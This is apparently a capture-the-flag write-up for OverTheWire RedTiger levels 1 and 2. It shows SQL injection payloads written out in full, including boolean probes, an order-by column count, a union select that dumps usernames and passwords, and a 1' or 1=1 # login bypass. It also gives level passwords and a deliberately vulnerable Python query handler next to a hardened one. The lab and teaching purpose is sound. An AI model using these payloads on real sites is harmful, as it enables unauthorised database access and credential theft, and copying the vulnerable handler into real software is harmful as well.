OverTheWire RedTiger

 April 21, 2021    OverTheWire

RedTiger 1

  • Target: Get the login for the user Hornoxe
  • Hint: You really need one? omg -_-
  • Tablename: level1_users
  • If we click on the category, it adds ?cat=1 to the URL.
  • Let's try adding ?cat=1 and 1 and 1=1# which gives us the same result. ?cat=1 and 1 and 1=2# on the other hand generates an error, so the parameter value is being evaluated as part of the SQL query.
  • We can find out how many columns the query returns with ?cat=1 order by 5#. Since 5 gives us an error and 4 does not, there are 4 columns. Columns 3 and 4 can be used to display output: ?cat=1 union select 1,2,3,4 from level1_users#
  • Let's get the password: ?cat=1 union select 1,2,username,password from level1_users #
  • The user is Hornoxe and the password is thatwaseasy
  • The password is passwords_will_change_over_time_let_us_do_a_shitty_rhyme
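
Why the cat parameter behaves this way, and what closes the hole, as an added example that is not code from the challenge or from the original write-up. It assumes an in-memory SQLite database with constructed sample rows; the level1_news table, its columns and all function names are hypothetical, and the trailing # (a MySQL comment marker) is left off because nothing follows the value in this query.

```python
import sqlite3

def make_db():
    # Constructed sample data. level1_news and its columns are hypothetical;
    # only level1_users, username and password are named in the write-up.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE level1_news (id INTEGER, cat INTEGER, title TEXT, body TEXT);
        CREATE TABLE level1_users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO level1_news VALUES (1, 1, 'Welcome', 'First post');
        INSERT INTO level1_users VALUES (1, 'sample_user', 'sample_secret');
    """)
    return db

def news_vulnerable(db, cat):
    # The request value becomes part of the SQL text, so the database parses
    # "and 1=2", "order by 5" or "union select ..." as query syntax.
    sql = "SELECT id, cat, title, body FROM level1_news WHERE cat = " + cat
    return db.execute(sql).fetchall()

def news_hardened(db, cat):
    # Allow-list the expected type first, then bind the value as a parameter
    # so it can only ever be compared as data.
    if not (cat.isascii() and cat.isdigit()):
        raise ValueError("cat must be a non-negative integer")
    sql = "SELECT id, cat, title, body FROM level1_news WHERE cat = ?"
    return db.execute(sql, (int(cat),)).fetchall()

def probe(handler, db, cat):
    # Return the rows, or the exception class name if the request fails.
    try:
        return handler(db, cat)
    except (sqlite3.Error, ValueError) as exc:
        return type(exc).__name__

if __name__ == "__main__":
    db = make_db()
    # Values from the write-up, without the trailing MySQL "#" comment marker.
    for cat in ["1", "1 and 1 and 1=1", "1 and 1 and 1=2", "1 order by 4",
                "1 order by 5", "1 union select 1,2,username,password from level1_users"]:
        print(repr(cat), probe(news_vulnerable, db, cat), probe(news_hardened, db, cat))
```

With the hardened handler every non-integer value is rejected the same way, so the true/false and column-count differences the write-up relies on no longer exist.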


RedTiger 2

  • Target: Login
  • Hint: Condition
  • We can try an always-true condition for both the username and the password: 1' or 1=1 #
  • The password is feed_the_cat_who_eats_your_bread